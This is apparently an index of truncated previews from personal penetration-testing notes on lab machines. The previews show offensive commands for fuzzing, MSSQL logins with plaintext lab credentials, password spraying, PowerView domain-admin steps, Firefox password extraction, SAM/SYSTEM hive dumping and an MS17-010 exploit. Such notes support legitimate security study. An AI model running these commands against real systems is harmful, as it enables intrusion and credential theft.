JuicyPotato The tool takes advantage of the SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege if enabled on the machine to elevate the local privileges to System. Normally, these privileges ...

WFUZZ Basic Fuzzing: wfuzz -c -t 200 --hc 404 -w /usr/share/seclists/Discovery/Web-Content/IIS.fuzz.txt -u http://10.10.10.203/FUZZ Examples: Worker [[StreamIO#^a1b013]] Subdomain fuzzing: wfuzz...

Connection impacket-mssqlclient sa@10.11.1.31 -p 1433 -db tempdb # Sometimes you need to specify a Windows Authentication impacket-mssqlclient Archetype/sql_svc:M3g4c0rp123@10.129.95.187 -windows-...

Crackmapexec While executing a Password Spraying attack with crackmapexec always run the --continue-on-success flag, sometimes there are some cases when two users can have the same password cr...

In order to create an XML file with credentials via powershell we can run the following commands: C:\Users\nico\Desktop> $credential = Get-Credential C:\Users\nico\Desktop> $credential | Exp...

This is a collection of techniques to get Domain Admin via multiple techniques. Assign user to a group Import-Module ./PowerView.ps1 $SecPassword = ConvertTo-SecureString 'JDg0dd1s@d0p3cr3@t0r' -As...

Firefox Cache passwords First go to the path file session for the user: # For Windows: C:\\Users\\nikk37\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\br53rxeg.default-release # For Linux /.mozi...

RDP into a remote machine XFREERDP To access windows via port tcp-3389 into a system: /u - user /p - password /w - weight /h - height /v - remote machine xfreerdp /u:JohnDoe /p:Pwd1...

Traditional dumping In order to dump the same, two register keys must be retrieved: reg save hklm\sam c:\sam reg save hklm\system c:\system You need to use impacket-secretsdump to retrieve hash...

IIS 5.0 In order to exploit an IIS 5.0 server the zzz_exploit.py script that is to be found here: MS17-010 is the best choice, first of all we need to create a virtual environment with python as t...